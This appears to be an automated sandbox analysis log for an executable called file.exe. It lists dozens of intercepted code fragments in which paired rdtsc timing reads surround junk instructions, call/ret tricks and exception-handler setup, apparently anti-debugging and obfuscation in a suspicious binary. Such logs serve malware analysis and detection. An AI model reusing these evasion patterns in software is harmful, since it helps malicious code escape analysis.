Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC55CA second address: EC55D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC55D6 second address: EC55DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC55DF second address: EC55E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7372 second address: EC7380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB87Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7380 second address: EC73EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnp 00007F0154ED053Eh 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1C4Bh], edi 0x00000019 push 00000000h 0x0000001b mov bl, ah 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F0154ED0538h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 jmp 00007F0154ED053Bh 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jbe 00007F0154ED0538h 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC73EC second address: EC73F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC73F1 second address: EC7405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0154ED053Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC651E second address: EC6523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6523 second address: EC6528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6528 second address: EC653A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0154ECB876h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC653A second address: EC6549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F0154ED053Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC8404 second address: EC840A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9498 second address: EC94B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0154ED0541h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB59D second address: ECB5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB5A3 second address: ECB5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB5A7 second address: ECB5D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F0154ECB891h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB5D6 second address: ECB5FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED0544h 0x00000009 jmp 00007F0154ED053Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB5FD second address: ECB601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6F3EC second address: E6F3F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6F3F0 second address: E6F3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECBCAB second address: ECBD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED053Bh 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c js 00007F0154ED0545h 0x00000012 push ecx 0x00000013 jmp 00007F0154ED053Dh 0x00000018 pop ecx 0x00000019 nop 0x0000001a mov di, CBBEh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F0154ED0538h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D34F5h], ecx 0x00000040 stc 0x00000041 push 00000000h 0x00000043 mov edi, dword ptr [ebp+122D383Eh] 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b jc 00007F0154ED0542h 0x00000051 pushad 0x00000052 push edi 0x00000053 pop edi 0x00000054 jng 00007F0154ED0536h 0x0000005a popad 0x0000005b popad 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F0154ED0546h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCD9E second address: ECCE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F0154ECB87Ch 0x0000000a pop ecx 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0154ECB878h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 xor bx, F6D0h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F0154ECB878h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c mov edi, 7493C231h 0x00000051 sbb bl, 00000030h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push eax 0x00000059 pop eax 0x0000005a ja 00007F0154ECB876h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECDDAD second address: ECDDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED053Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9603 second address: EC9607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9607 second address: EC9615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0154ED053Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9615 second address: EC96A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnl 00007F0154ECB884h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F0154ECB878h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+1246134Ah] 0x0000002d push dword ptr fs:[00000000h] 0x00000034 add dword ptr [ebp+122D3637h], ecx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 or dword ptr [ebp+122D26CAh], ebx 0x00000047 mov eax, dword ptr [ebp+122D1631h] 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007F0154ECB878h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 mov edi, dword ptr [ebp+122D354Fh] 0x0000006d push FFFFFFFFh 0x0000006f and edi, 4B0C7AC1h 0x00000075 push eax 0x00000076 push ecx 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC8581 second address: EC8585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCF80 second address: ECCFA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0154ECB886h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCFA3 second address: ECD01A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F0154ED0538h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3AB2h] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov dword ptr [ebp+12459CF1h], edi 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov bx, dx 0x00000040 mov bx, F6F7h 0x00000044 mov eax, dword ptr [ebp+122D1119h] 0x0000004a mov ebx, dword ptr [ebp+122D38F2h] 0x00000050 push FFFFFFFFh 0x00000052 jnl 00007F0154ED053Ch 0x00000058 nop 0x00000059 jmp 00007F0154ED053Bh 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 jp 00007F0154ED0536h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE050 second address: ECE06C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ECB888h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD01A second address: ECD024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE06C second address: ECE083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F0154ECB87Ch 0x00000011 js 00007F0154ECB876h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD024 second address: ECD028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE083 second address: ECE089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED0CB1 second address: ED0CB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD028 second address: ECD02C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECEE8B second address: ECEE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECEE92 second address: ECEE9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0154ECB876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECEE9C second address: ECEECD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F0154ED053Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0154ED0542h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECEECD second address: ECEED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECFE43 second address: ECFE49 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED0DF1 second address: ED0E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+12488F11h], edi 0x0000000f mov ebx, dword ptr [ebp+122D5B30h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F0154ECB878h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov ebx, dword ptr [ebp+122D2DCCh] 0x00000043 mov eax, dword ptr [ebp+122D1109h] 0x00000049 jmp 00007F0154ECB882h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F0154ECB878h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a jmp 00007F0154ECB881h 0x0000006f nop 0x00000070 jmp 00007F0154ECB87Ch 0x00000075 push eax 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED3F58 second address: ED3F5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED6187 second address: ED618D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9421 second address: ED9427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9427 second address: ED9430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9430 second address: ED944D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0154ED053Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED95A7 second address: ED95AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD6D5 second address: EDD6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE0952 second address: EE0966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0154ECB876h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE0B04 second address: EE0B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push ebx 0x00000007 jp 00007F0154ED053Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE0B13 second address: EE0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push ecx 0x0000000a jmp 00007F0154ECB87Ah 0x0000000f pop ecx 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0154ECB883h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6BE35 second address: E6BE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE69BD second address: EE69C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6F59 second address: EE6F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED0541h 0x00000009 jmp 00007F0154ED0546h 0x0000000e popad 0x0000000f pushad 0x00000010 je 00007F0154ED0536h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6F8E second address: EE6F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6F97 second address: EE6F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE70E3 second address: EE7124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB87Eh 0x00000009 push edi 0x0000000a jnc 00007F0154ECB876h 0x00000010 pop edi 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop eax 0x00000017 pushad 0x00000018 jmp 00007F0154ECB888h 0x0000001d jl 00007F0154ECB876h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7333 second address: EE7348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED053Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7348 second address: EE7367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0154ECB888h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7367 second address: EE736B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE74E5 second address: EE751F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB888h 0x00000007 jl 00007F0154ECB876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0154ECB87Fh 0x00000014 pushad 0x00000015 js 00007F0154ECB876h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE76BA second address: EE76C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7826 second address: EE782A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE782A second address: EE783C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F0154ED0536h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE783C second address: EE7846 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0154ECB876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC4B3 second address: EEC4B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC7A7 second address: EEC7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC90B second address: EEC929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0154ED0536h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0154ED0541h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC929 second address: EEC944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB881h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC944 second address: EEC954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED053Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EECD2E second address: EECD32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EECD32 second address: EECD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED0549h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0154ED053Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EED029 second address: EED05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB87Bh 0x00000009 jmp 00007F0154ECB87Ch 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 jmp 00007F0154ECB883h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EED05A second address: EED070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED0542h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC196 second address: EEC19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC19A second address: EEC1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 js 00007F0154ED054Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF11D2 second address: EF11F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB889h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF59FB second address: EF5A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0545h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBBD86 second address: EBBD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBBD8A second address: EBBD94 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
